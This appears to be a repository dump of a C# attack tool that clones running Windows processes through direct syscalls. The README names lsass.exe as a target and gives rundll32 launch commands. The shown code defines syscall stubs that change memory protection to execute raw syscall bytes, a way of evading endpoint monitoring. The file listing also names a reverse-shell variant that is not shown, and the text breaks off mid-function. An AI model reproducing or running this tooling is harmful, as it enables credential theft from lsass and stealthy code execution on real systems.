├── README.md ├── CloneProcess.cs └── CloneProcessRevShell.cs /README.md: -------------------------------------------------------------------------------- 1 | # CloneProcess 2 | Clone running process with ZwCreateProcess (syscall) 3 | 4 | Compile as https://github.com/mobdk/compilecs and insert entrypoint 5 | Executing: rundll32 CloneProcess.dll,#1 or rundll32 CloneProcess.dll,DllMain 6 | 7 | Tested on 64 bit Windows 10 build 2004 19041.572 8 | 9 | Cloning non admin process works also, if one like to clone svchost.exe with arguments fx: svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc 10 | 11 | int ProcId = FindTheRightPID("svchost.exe", "PrintWorkflow", "PrintWorkflowUserSvc", ""); FindTheRightPID will return the correct PID 12 | 13 | Cloning admin process like lsass.exe fx: int ProcId = FindTheRightPID("lsass.exe", "", "", ""); rundll32 CloneProcess.dll,#1 must be 14 | running as admin. 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /CloneProcess.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Security; 3 | using System.Diagnostics; 4 | using System.Runtime.InteropServices; 5 | using System.Runtime.ConstrainedExecution; 6 | using System.Management; 7 | using System.Security.Principal; 8 | using System.Collections.Generic; 9 | using System.ComponentModel; 10 | using System.Security.Permissions; 11 | using Microsoft.Win32.SafeHandles; 12 | using System.Linq; 13 | using System.Reflection; 14 | using System.Security.AccessControl; 15 | using System.Text; 16 | using System.Threading; 17 | using System.Security.Cryptography; 18 | using System.IO; 19 | 20 | namespace code 21 | { 22 | class Program 23 | { 24 | 25 | public enum NTSTATUS : uint 26 | { 27 | Success = 0x00000000, 28 | Wait0 = 0x00000000, 29 | Wait1 = 0x00000001, 30 | Wait2 = 0x00000002, 31 | Wait3 = 0x00000003, 32 | Wait63 = 0x0000003f, 33 | Abandoned = 0x00000080, 34 | AbandonedWait0 = 0x00000080, 35 | AbandonedWait1 = 0x00000081, 36 | AbandonedWait2 = 0x00000082, 37 | AbandonedWait3 = 0x00000083, 38 | AbandonedWait63 = 0x000000bf, 39 | UserApc = 0x000000c0, 40 | KernelApc = 0x00000100, 41 | Alerted = 0x00000101, 42 | Timeout = 0x00000102, 43 | Pending = 0x00000103, 44 | Reparse = 0x00000104, 45 | MoreEntries = 0x00000105, 46 | NotAllAssigned = 0x00000106, 47 | SomeNotMapped = 0x00000107, 48 | OpLockBreakInProgress = 0x00000108, 49 | VolumeMounted = 0x00000109, 50 | RxActCommitted = 0x0000010a, 51 | NotifyCleanup = 0x0000010b, 52 | NotifyEnumDir = 0x0000010c, 53 | NoQuotasForAccount = 0x0000010d, 54 | PrimaryTransportConnectFailed = 0x0000010e, 55 | PageFaultTransition = 0x00000110, 56 | PageFaultDemandZero = 0x00000111, 57 | PageFaultCopyOnWrite = 0x00000112, 58 | PageFaultGuardPage = 0x00000113, 59 | PageFaultPagingFile = 0x00000114, 60 | CrashDump = 0x00000116, 61 | ReparseObject = 0x00000118, 62 | NothingToTerminate = 0x00000122, 63 | ProcessNotInJob = 0x00000123, 64 | ProcessInJob = 0x00000124, 65 | ProcessCloned = 0x00000129, 66 | FileLockedWithOnlyReaders = 0x0000012a, 67 | FileLockedWithWriters = 0x0000012b, 68 | Informational = 0x40000000, 69 | ObjectNameExists = 0x40000000, 70 | ThreadWasSuspended = 0x40000001, 71 | WorkingSetLimitRange = 0x40000002, 72 | ImageNotAtBase = 0x40000003, 73 | RegistryRecovered = 0x40000009, 74 | Warning = 0x80000000, 75 | GuardPageViolation = 0x80000001, 76 | DatatypeMisalignment = 0x80000002, 77 | Breakpoint = 0x80000003, 78 | SingleStep = 0x80000004, 79 | BufferOverflow = 0x80000005, 80 | NoMoreFiles = 0x80000006, 81 | HandlesClosed = 0x8000000a, 82 | PartialCopy = 0x8000000d, 83 | DeviceBusy = 0x80000011, 84 | InvalidEaName = 0x80000013, 85 | EaListInconsistent = 0x80000014, 86 | NoMoreEntries = 0x8000001a, 87 | LongJump = 0x80000026, 88 | DllMightBeInsecure = 0x8000002b, 89 | Error = 0xc0000000, 90 | Unsuccessful = 0xc0000001, 91 | NotImplemented = 0xc0000002, 92 | InvalidInfoClass = 0xc0000003, 93 | InfoLengthMismatch = 0xc0000004, 94 | AccessViolation = 0xc0000005, 95 | InPageError = 0xc0000006, 96 | PagefileQuota = 0xc0000007, 97 | InvalidHandle = 0xc0000008, 98 | BadInitialStack = 0xc0000009, 99 | BadInitialPc = 0xc000000a, 100 | InvalidCid = 0xc000000b, 101 | TimerNotCanceled = 0xc000000c, 102 | InvalidParameter = 0xc000000d, 103 | NoSuchDevice = 0xc000000e, 104 | NoSuchFile = 0xc000000f, 105 | InvalidDeviceRequest = 0xc0000010, 106 | EndOfFile = 0xc0000011, 107 | WrongVolume = 0xc0000012, 108 | NoMediaInDevice = 0xc0000013, 109 | NoMemory = 0xc0000017, 110 | ConflictingAddresses = 0xc0000018, 111 | NotMappedView = 0xc0000019, 112 | UnableToFreeVm = 0xc000001a, 113 | UnableToDeleteSection = 0xc000001b, 114 | IllegalInstruction = 0xc000001d, 115 | AlreadyCommitted = 0xc0000021, 116 | AccessDenied = 0xc0000022, 117 | BufferTooSmall = 0xc0000023, 118 | ObjectTypeMismatch = 0xc0000024, 119 | NonContinuableException = 0xc0000025, 120 | BadStack = 0xc0000028, 121 | NotLocked = 0xc000002a, 122 | NotCommitted = 0xc000002d, 123 | InvalidParameterMix = 0xc0000030, 124 | ObjectNameInvalid = 0xc0000033, 125 | ObjectNameNotFound = 0xc0000034, 126 | ObjectNameCollision = 0xc0000035, 127 | ObjectPathInvalid = 0xc0000039, 128 | ObjectPathNotFound = 0xc000003a, 129 | ObjectPathSyntaxBad = 0xc000003b, 130 | DataOverrun = 0xc000003c, 131 | DataLate = 0xc000003d, 132 | DataError = 0xc000003e, 133 | CrcError = 0xc000003f, 134 | SectionTooBig = 0xc0000040, 135 | PortConnectionRefused = 0xc0000041, 136 | InvalidPortHandle = 0xc0000042, 137 | SharingViolation = 0xc0000043, 138 | QuotaExceeded = 0xc0000044, 139 | InvalidPageProtection = 0xc0000045, 140 | MutantNotOwned = 0xc0000046, 141 | SemaphoreLimitExceeded = 0xc0000047, 142 | PortAlreadySet = 0xc0000048, 143 | SectionNotImage = 0xc0000049, 144 | SuspendCountExceeded = 0xc000004a, 145 | ThreadIsTerminating = 0xc000004b, 146 | BadWorkingSetLimit = 0xc000004c, 147 | IncompatibleFileMap = 0xc000004d, 148 | SectionProtection = 0xc000004e, 149 | EasNotSupported = 0xc000004f, 150 | EaTooLarge = 0xc0000050, 151 | NonExistentEaEntry = 0xc0000051, 152 | NoEasOnFile = 0xc0000052, 153 | EaCorruptError = 0xc0000053, 154 | FileLockConflict = 0xc0000054, 155 | LockNotGranted = 0xc0000055, 156 | DeletePending = 0xc0000056, 157 | CtlFileNotSupported = 0xc0000057, 158 | UnknownRevision = 0xc0000058, 159 | RevisionMismatch = 0xc0000059, 160 | InvalidOwner = 0xc000005a, 161 | InvalidPrimaryGroup = 0xc000005b, 162 | NoImpersonationToken = 0xc000005c, 163 | CantDisableMandatory = 0xc000005d, 164 | NoLogonServers = 0xc000005e, 165 | NoSuchLogonSession = 0xc000005f, 166 | NoSuchPrivilege = 0xc0000060, 167 | PrivilegeNotHeld = 0xc0000061, 168 | InvalidAccountName = 0xc0000062, 169 | UserExists = 0xc0000063, 170 | NoSuchUser = 0xc0000064, 171 | GroupExists = 0xc0000065, 172 | NoSuchGroup = 0xc0000066, 173 | MemberInGroup = 0xc0000067, 174 | MemberNotInGroup = 0xc0000068, 175 | LastAdmin = 0xc0000069, 176 | WrongPassword = 0xc000006a, 177 | IllFormedPassword = 0xc000006b, 178 | PasswordRestriction = 0xc000006c, 179 | LogonFailure = 0xc000006d, 180 | AccountRestriction = 0xc000006e, 181 | InvalidLogonHours = 0xc000006f, 182 | InvalidWorkstation = 0xc0000070, 183 | PasswordExpired = 0xc0000071, 184 | AccountDisabled = 0xc0000072, 185 | NoneMapped = 0xc0000073, 186 | TooManyLuidsRequested = 0xc0000074, 187 | LuidsExhausted = 0xc0000075, 188 | InvalidSubAuthority = 0xc0000076, 189 | InvalidAcl = 0xc0000077, 190 | InvalidSid = 0xc0000078, 191 | InvalidSecurityDescr = 0xc0000079, 192 | ProcedureNotFound = 0xc000007a, 193 | InvalidImageFormat = 0xc000007b, 194 | NoToken = 0xc000007c, 195 | BadInheritanceAcl = 0xc000007d, 196 | RangeNotLocked = 0xc000007e, 197 | DiskFull = 0xc000007f, 198 | ServerDisabled = 0xc0000080, 199 | ServerNotDisabled = 0xc0000081, 200 | TooManyGuidsRequested = 0xc0000082, 201 | GuidsExhausted = 0xc0000083, 202 | InvalidIdAuthority = 0xc0000084, 203 | AgentsExhausted = 0xc0000085, 204 | InvalidVolumeLabel = 0xc0000086, 205 | SectionNotExtended = 0xc0000087, 206 | NotMappedData = 0xc0000088, 207 | ResourceDataNotFound = 0xc0000089, 208 | ResourceTypeNotFound = 0xc000008a, 209 | ResourceNameNotFound = 0xc000008b, 210 | ArrayBoundsExceeded = 0xc000008c, 211 | FloatDenormalOperand = 0xc000008d, 212 | FloatDivideByZero = 0xc000008e, 213 | FloatInexactResult = 0xc000008f, 214 | FloatInvalidOperation = 0xc0000090, 215 | FloatOverflow = 0xc0000091, 216 | FloatStackCheck = 0xc0000092, 217 | FloatUnderflow = 0xc0000093, 218 | IntegerDivideByZero = 0xc0000094, 219 | IntegerOverflow = 0xc0000095, 220 | PrivilegedInstruction = 0xc0000096, 221 | TooManyPagingFiles = 0xc0000097, 222 | FileInvalid = 0xc0000098, 223 | InstanceNotAvailable = 0xc00000ab, 224 | PipeNotAvailable = 0xc00000ac, 225 | InvalidPipeState = 0xc00000ad, 226 | PipeBusy = 0xc00000ae, 227 | IllegalFunction = 0xc00000af, 228 | PipeDisconnected = 0xc00000b0, 229 | PipeClosing = 0xc00000b1, 230 | PipeConnected = 0xc00000b2, 231 | PipeListening = 0xc00000b3, 232 | InvalidReadMode = 0xc00000b4, 233 | IoTimeout = 0xc00000b5, 234 | FileForcedClosed = 0xc00000b6, 235 | ProfilingNotStarted = 0xc00000b7, 236 | ProfilingNotStopped = 0xc00000b8, 237 | NotSameDevice = 0xc00000d4, 238 | FileRenamed = 0xc00000d5, 239 | CantWait = 0xc00000d8, 240 | PipeEmpty = 0xc00000d9, 241 | CantTerminateSelf = 0xc00000db, 242 | InternalError = 0xc00000e5, 243 | InvalidParameter1 = 0xc00000ef, 244 | InvalidParameter2 = 0xc00000f0, 245 | InvalidParameter3 = 0xc00000f1, 246 | InvalidParameter4 = 0xc00000f2, 247 | InvalidParameter5 = 0xc00000f3, 248 | InvalidParameter6 = 0xc00000f4, 249 | InvalidParameter7 = 0xc00000f5, 250 | InvalidParameter8 = 0xc00000f6, 251 | InvalidParameter9 = 0xc00000f7, 252 | InvalidParameter10 = 0xc00000f8, 253 | InvalidParameter11 = 0xc00000f9, 254 | InvalidParameter12 = 0xc00000fa, 255 | MappedFileSizeZero = 0xc000011e, 256 | TooManyOpenedFiles = 0xc000011f, 257 | Cancelled = 0xc0000120, 258 | CannotDelete = 0xc0000121, 259 | InvalidComputerName = 0xc0000122, 260 | FileDeleted = 0xc0000123, 261 | SpecialAccount = 0xc0000124, 262 | SpecialGroup = 0xc0000125, 263 | SpecialUser = 0xc0000126, 264 | MembersPrimaryGroup = 0xc0000127, 265 | FileClosed = 0xc0000128, 266 | TooManyThreads = 0xc0000129, 267 | ThreadNotInProcess = 0xc000012a, 268 | TokenAlreadyInUse = 0xc000012b, 269 | PagefileQuotaExceeded = 0xc000012c, 270 | CommitmentLimit = 0xc000012d, 271 | InvalidImageLeFormat = 0xc000012e, 272 | InvalidImageNotMz = 0xc000012f, 273 | InvalidImageProtect = 0xc0000130, 274 | InvalidImageWin16 = 0xc0000131, 275 | LogonServer = 0xc0000132, 276 | DifferenceAtDc = 0xc0000133, 277 | SynchronizationRequired = 0xc0000134, 278 | DllNotFound = 0xc0000135, 279 | IoPrivilegeFailed = 0xc0000137, 280 | OrdinalNotFound = 0xc0000138, 281 | EntryPointNotFound = 0xc0000139, 282 | ControlCExit = 0xc000013a, 283 | PortNotSet = 0xc0000353, 284 | DebuggerInactive = 0xc0000354, 285 | CallbackBypass = 0xc0000503, 286 | PortClosed = 0xc0000700, 287 | MessageLost = 0xc0000701, 288 | InvalidMessage = 0xc0000702, 289 | RequestCanceled = 0xc0000703, 290 | RecursiveDispatch = 0xc0000704, 291 | LpcReceiveBufferExpected = 0xc0000705, 292 | LpcInvalidConnectionUsage = 0xc0000706, 293 | LpcRequestsNotAllowed = 0xc0000707, 294 | ResourceInUse = 0xc0000708, 295 | ProcessIsProtected = 0xc0000712, 296 | VolumeDirty = 0xc0000806, 297 | FileCheckedOut = 0xc0000901, 298 | CheckOutRequired = 0xc0000902, 299 | BadFileType = 0xc0000903, 300 | FileTooLarge = 0xc0000904, 301 | FormsAuthRequired = 0xc0000905, 302 | VirusInfected = 0xc0000906, 303 | VirusDeleted = 0xc0000907, 304 | TransactionalConflict = 0xc0190001, 305 | InvalidTransaction = 0xc0190002, 306 | TransactionNotActive = 0xc0190003, 307 | TmInitializationFailed = 0xc0190004, 308 | RmNotActive = 0xc0190005, 309 | RmMetadataCorrupt = 0xc0190006, 310 | TransactionNotJoined = 0xc0190007, 311 | DirectoryNotRm = 0xc0190008, 312 | CouldNotResizeLog = 0xc0190009, 313 | TransactionsUnsupportedRemote = 0xc019000a, 314 | LogResizeInvalidSize = 0xc019000b, 315 | RemoteFileVersionMismatch = 0xc019000c, 316 | CrmProtocolAlreadyExists = 0xc019000f, 317 | TransactionPropagationFailed = 0xc0190010, 318 | CrmProtocolNotFound = 0xc0190011, 319 | TransactionSuperiorExists = 0xc0190012, 320 | TransactionRequestNotValid = 0xc0190013, 321 | TransactionNotRequested = 0xc0190014, 322 | TransactionAlreadyAborted = 0xc0190015, 323 | TransactionAlreadyCommitted = 0xc0190016, 324 | TransactionInvalidMarshallBuffer = 0xc0190017, 325 | CurrentTransactionNotValid = 0xc0190018, 326 | LogGrowthFailed = 0xc0190019, 327 | ObjectNoLongerExists = 0xc0190021, 328 | StreamMiniversionNotFound = 0xc0190022, 329 | StreamMiniversionNotValid = 0xc0190023, 330 | MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, 331 | CantOpenMiniversionWithModifyIntent = 0xc0190025, 332 | CantCreateMoreStreamMiniversions = 0xc0190026, 333 | HandleNoLongerValid = 0xc0190028, 334 | NoTxfMetadata = 0xc0190029, 335 | LogCorruptionDetected = 0xc0190030, 336 | CantRecoverWithHandleOpen = 0xc0190031, 337 | RmDisconnected = 0xc0190032, 338 | EnlistmentNotSuperior = 0xc0190033, 339 | RecoveryNotNeeded = 0xc0190034, 340 | RmAlreadyStarted = 0xc0190035, 341 | FileIdentityNotPersistent = 0xc0190036, 342 | CantBreakTransactionalDependency = 0xc0190037, 343 | CantCrossRmBoundary = 0xc0190038, 344 | TxfDirNotEmpty = 0xc0190039, 345 | IndoubtTransactionsExist = 0xc019003a, 346 | TmVolatile = 0xc019003b, 347 | RollbackTimerExpired = 0xc019003c, 348 | TxfAttributeCorrupt = 0xc019003d, 349 | EfsNotAllowedInTransaction = 0xc019003e, 350 | TransactionalOpenNotAllowed = 0xc019003f, 351 | TransactedMappingUnsupportedRemote = 0xc0190040, 352 | TxfMetadataAlreadyPresent = 0xc0190041, 353 | TransactionScopeCallbacksNotSet = 0xc0190042, 354 | TransactionRequiredPromotion = 0xc0190043, 355 | CannotExecuteFileInTransaction = 0xc0190044, 356 | TransactionsNotFrozen = 0xc0190045, 357 | MaximumNtStatus = 0xffffffff 358 | }; 359 | 360 | 361 | public enum ProcessAccessFlags : uint 362 | { 363 | Terminate = 0x00000001, 364 | CreateThread = 0x00000002, 365 | VMOperation = 0x00000008, 366 | VMRead = 0x00000010, 367 | VMWrite = 0x00000020, 368 | DupHandle = 0x00000040, 369 | SetInformation = 0x00000200, 370 | QueryInformation = 0x00000400, 371 | Synchronize = 0x00100000, 372 | All = 0x001F0FFF 373 | } 374 | 375 | [StructLayout(LayoutKind.Sequential)] 376 | public struct OBJECT_ATTRIBUTES 377 | { 378 | public ulong Length; 379 | public IntPtr RootDirectory; 380 | public IntPtr ObjectName; 381 | public ulong Attributes; 382 | public IntPtr SecurityDescriptor; 383 | public IntPtr SecurityQualityOfService; 384 | } 385 | 386 | [StructLayout(LayoutKind.Sequential)] 387 | public struct SECTION_DATA 388 | { 389 | public Boolean isvalid; 390 | public IntPtr SectionHandle; 391 | public IntPtr pBase; 392 | } 393 | 394 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 395 | public struct OSVERSIONINFOEXW 396 | { 397 | public int dwOSVersionInfoSize; 398 | public int dwMajorVersion; 399 | public int dwMinorVersion; 400 | public int dwBuildNumber; 401 | public int dwPlatformId; 402 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)] 403 | public string szCSDVersion; 404 | public UInt16 wServicePackMajor; 405 | public UInt16 wServicePackMinor; 406 | public UInt16 wSuiteMask; 407 | public byte wProductType; 408 | public byte wReserved; 409 | } 410 | 411 | 412 | [Flags] 413 | public enum ACCESS_MASK : uint 414 | { 415 | DELETE = 0x00010000, 416 | READ_CONTROL = 0x00020000, 417 | WRITE_DAC = 0x00040000, 418 | WRITE_OWNER = 0x00080000, 419 | SYNCHRONIZE = 0x00100000, 420 | STANDARD_RIGHTS_REQUIRED = 0x000F0000, 421 | STANDARD_RIGHTS_READ = 0x00020000, 422 | STANDARD_RIGHTS_WRITE = 0x00020000, 423 | STANDARD_RIGHTS_EXECUTE = 0x00020000, 424 | STANDARD_RIGHTS_ALL = 0x001F0000, 425 | SPECIFIC_RIGHTS_ALL = 0x0000FFFF, 426 | ACCESS_SYSTEM_SECURITY = 0x01000000, 427 | MAXIMUM_ALLOWED = 0x02000000, 428 | GENERIC_READ = 0x80000000, 429 | GENERIC_WRITE = 0x40000000, 430 | GENERIC_EXECUTE = 0x20000000, 431 | GENERIC_ALL = 0x10000000, 432 | DESKTOP_READOBJECTS = 0x00000001, 433 | DESKTOP_CREATEWINDOW = 0x00000002, 434 | DESKTOP_CREATEMENU = 0x00000004, 435 | DESKTOP_HOOKCONTROL = 0x00000008, 436 | DESKTOP_JOURNALRECORD = 0x00000010, 437 | DESKTOP_JOURNALPLAYBACK = 0x00000020, 438 | DESKTOP_ENUMERATE = 0x00000040, 439 | DESKTOP_WRITEOBJECTS = 0x00000080, 440 | DESKTOP_SWITCHDESKTOP = 0x00000100, 441 | WINSTA_ENUMDESKTOPS = 0x00000001, 442 | WINSTA_READATTRIBUTES = 0x00000002, 443 | WINSTA_ACCESSCLIPBOARD = 0x00000004, 444 | WINSTA_CREATEDESKTOP = 0x00000008, 445 | WINSTA_WRITEATTRIBUTES = 0x00000010, 446 | WINSTA_ACCESSGLOBALATOMS = 0x00000020, 447 | WINSTA_EXITWINDOWS = 0x00000040, 448 | WINSTA_ENUMERATE = 0x00000100, 449 | WINSTA_READSCREEN = 0x00000200, 450 | WINSTA_ALL_ACCESS = 0x0000037F 451 | } 452 | 453 | [StructLayout(LayoutKind.Sequential)] 454 | public struct CLIENT_ID 455 | { 456 | public IntPtr UniqueProcess; 457 | public IntPtr UniqueThread; 458 | } 459 | 460 | [SuppressUnmanagedCodeSecurity] 461 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 462 | public delegate NTSTATUS ProtectorX(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect ); 463 | public static NTSTATUS Protector(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect) 464 | { 465 | IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "ZwProtectVirtualMemory", false); 466 | ProtectorX ProtectorFunc = (ProtectorX)Marshal.GetDelegateForFunctionPointer(proc, typeof(ProtectorX)); 467 | return (NTSTATUS)ProtectorFunc( ProcessHandle, ref BaseAddress, ref RegionSize, NewProtect, ref OldProtect ); 468 | } 469 | 470 | [SuppressUnmanagedCodeSecurity] 471 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 472 | public delegate NTSTATUS RtlCreateUserThreadX( IntPtr hProcess, uint lpThreadSecurity, bool bCreateSuspended, uint dwStackZeroBits, IntPtr pStackReserved, IntPtr pStackCommit, IntPtr pStartAddress, IntPtr pStartParameter, out IntPtr hThread, out CLIENT_ID pClientId ); 473 | public static NTSTATUS RtlCreateUserThread( IntPtr hProcess, uint lpThreadSecurity, bool bCreateSuspended, uint dwStackZeroBits, IntPtr pStackReserved, IntPtr pStackCommit, IntPtr pStartAddress, IntPtr pStartParameter, out IntPtr hThread, out CLIENT_ID pClientId ) 474 | { 475 | IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "RtlCreateUserThread", false); 476 | RtlCreateUserThreadX RtlCreateUserThreadXFunc = (RtlCreateUserThreadX)Marshal.GetDelegateForFunctionPointer(proc, typeof(RtlCreateUserThreadX)); 477 | return (NTSTATUS)RtlCreateUserThreadXFunc( hProcess, lpThreadSecurity, bCreateSuspended, dwStackZeroBits, pStackReserved, pStackCommit, pStartAddress, pStartParameter, out hThread, out pClientId ); 478 | } 479 | 480 | 481 | [SuppressUnmanagedCodeSecurity] 482 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 483 | public delegate NTSTATUS ZwProtectVirtualMemoryX(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 lpNumberOfBytesWritten); 484 | public static NTSTATUS ZwProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr NumberOfBytesToProtect, UInt32 NewAccessProtection, ref UInt32 lpNumberOfBytesWritten, ref OSVERSIONINFOEXW osVersionInfo) 485 | { 486 | byte [] syscall = GetOSVersionAndReturnSyscall( 16, ref osVersionInfo ); 487 | unsafe 488 | { 489 | fixed (byte* ptr = syscall) 490 | { 491 | IntPtr allocMemAddress = (IntPtr)ptr; 492 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 493 | UInt32 size = (uint)syscall.Length; 494 | IntPtr sizeIntPtr = (IntPtr)size; 495 | UInt32 oldprotect = 0; 496 | Protector( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect); 497 | ZwProtectVirtualMemoryX ZwProtectVirtualMemoryFunc = (ZwProtectVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwProtectVirtualMemoryX)); 498 | return (NTSTATUS)ZwProtectVirtualMemoryFunc( ProcessHandle, ref BaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, ref lpNumberOfBytesWritten); 499 | } 500 | } 501 | } 502 | 503 | [SuppressUnmanagedCodeSecurity] 504 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 505 | public delegate NTSTATUS ZwCreateSectionX( ref IntPtr section, UInt32 desiredAccess, IntPtr pAttrs, ref long MaximumSize, uint pageProt, uint allocationAttribs, IntPtr hFile ); 506 | public static NTSTATUS ZwCreateSection( ref IntPtr section, UInt32 desiredAccess, IntPtr pAttrs, ref long MaximumSize, uint pageProt, uint allocationAttribs, IntPtr hFile, ref OSVERSIONINFOEXW osVersionInfo ) 507 | { 508 | byte [] syscall = GetOSVersionAndReturnSyscall( 5, ref osVersionInfo ); 509 | unsafe 510 | { 511 | fixed (byte* ptr = syscall) 512 | { 513 | IntPtr allocMemAddress = (IntPtr)ptr; 514 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 515 | UInt32 size = (uint)syscall.Length; 516 | IntPtr sizeIntPtr = (IntPtr)size; 517 | UInt32 oldprotect = 0; 518 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 519 | ZwCreateSectionX ZwCreateSectionFunc = (ZwCreateSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateSectionX)); 520 | return (NTSTATUS)ZwCreateSectionFunc( ref section, desiredAccess, pAttrs, ref MaximumSize, pageProt, allocationAttribs, hFile ); 521 | } 522 | 523 | } 524 | } 525 | 526 | [SuppressUnmanagedCodeSecurity] 527 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 528 | public delegate NTSTATUS ZwMapViewOfSectionX( IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize, ref long SectionOffset, ref long ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect ); 529 | public static NTSTATUS ZwMapViewOfSection( IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize, ref long SectionOffset, ref long ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect, ref OSVERSIONINFOEXW osVersionInfo) 530 | { 531 | byte [] syscall = GetOSVersionAndReturnSyscall( 6, ref osVersionInfo ); 532 | unsafe 533 | { 534 | fixed (byte* ptr = syscall) 535 | { 536 | IntPtr allocMemAddress = (IntPtr)ptr; 537 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 538 | UInt32 size = (uint)syscall.Length; 539 | IntPtr sizeIntPtr = (IntPtr)size; 540 | UInt32 oldprotect = 0; 541 | ZwProtectVirtualMemory( ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 542 | ZwMapViewOfSectionX ZwMapViewOfSectionFunc = (ZwMapViewOfSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwMapViewOfSectionX)); 543 | return (NTSTATUS)ZwMapViewOfSectionFunc( SectionHandle, ProcessHandle, ref BaseAddress, ZeroBits, CommitSize, ref SectionOffset, ref ViewSize, InheritDisposition, AllocationType, Win32Protect ); 544 | } 545 | 546 | } 547 | } 548 | 549 | [SuppressUnmanagedCodeSecurity] 550 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 551 | public delegate NTSTATUS ZwOpenProcessX(ref IntPtr ProcessHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid); 552 | public static NTSTATUS ZwOpenProcess(ref IntPtr ProcessHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid, ref OSVERSIONINFOEXW osVersionInfo) 553 | { 554 | byte [] syscall = GetOSVersionAndReturnSyscall( 1, ref osVersionInfo ); 555 | unsafe 556 | { 557 | fixed (byte* ptr = syscall) 558 | { 559 | IntPtr allocMemAddress = (IntPtr)ptr; 560 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 561 | UInt32 size = (uint)syscall.Length; 562 | IntPtr sizeIntPtr = (IntPtr)size; 563 | UInt32 oldprotect = 0; 564 | ZwProtectVirtualMemory( ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 565 | ZwOpenProcessX ZwOpenProcessFunc = (ZwOpenProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwOpenProcessX)); 566 | return (NTSTATUS)ZwOpenProcessFunc(ref ProcessHandle, processAccess, objAttribute, ref clientid); 567 | } 568 | 569 | } 570 | } 571 | 572 | [SuppressUnmanagedCodeSecurity] 573 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 574 | public delegate NTSTATUS NtCreateThreadExX(out IntPtr threadHandle,uint desiredAccess,IntPtr objectAttributes,IntPtr processHandle,IntPtr lpStartAddress,IntPtr lpParameter,int createSuspended,uint stackZeroBits,uint sizeOfStackCommit,uint sizeOfStackReserve,IntPtr lpBytesBuffer); 575 | public static NTSTATUS ZwCreateThreadEx(out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr lpStartAddress, IntPtr lpParameter, int createSuspended, uint stackZeroBits, uint sizeOfStackCommit, uint sizeOfStackReserve, IntPtr lpBytesBuffer, ref OSVERSIONINFOEXW osVersionInfo) 576 | { 577 | byte [] syscall = GetOSVersionAndReturnSyscall( 2, ref osVersionInfo ); 578 | unsafe 579 | { 580 | fixed (byte* ptr = syscall) 581 | { 582 | IntPtr allocMemAddress = (IntPtr)ptr; 583 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 584 | uint size = (uint)syscall.Length; 585 | IntPtr sizeIntPtr = (IntPtr)size; 586 | UInt32 oldprotect = 0; 587 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 588 | NtCreateThreadExX NtCreateThreadExFunc = (NtCreateThreadExX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(NtCreateThreadExX)); 589 | return (NTSTATUS)NtCreateThreadExFunc(out threadHandle, desiredAccess, objectAttributes, processHandle, lpStartAddress, lpParameter, createSuspended, stackZeroBits, sizeOfStackCommit, sizeOfStackReserve, lpBytesBuffer); 590 | } 591 | } 592 | } 593 | 594 | [SuppressUnmanagedCodeSecurity] 595 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 596 | public delegate NTSTATUS ZwCloseX( IntPtr ProcessHandle ); 597 | public static NTSTATUS ZwClose( IntPtr ProcessHandle, ref OSVERSIONINFOEXW osVersionInfo ) 598 | { 599 | byte [] syscall = GetOSVersionAndReturnSyscall( 13, ref osVersionInfo ); 600 | unsafe 601 | { 602 | fixed (byte* ptr = syscall) 603 | { 604 | IntPtr allocMemAddress = (IntPtr)ptr; 605 | 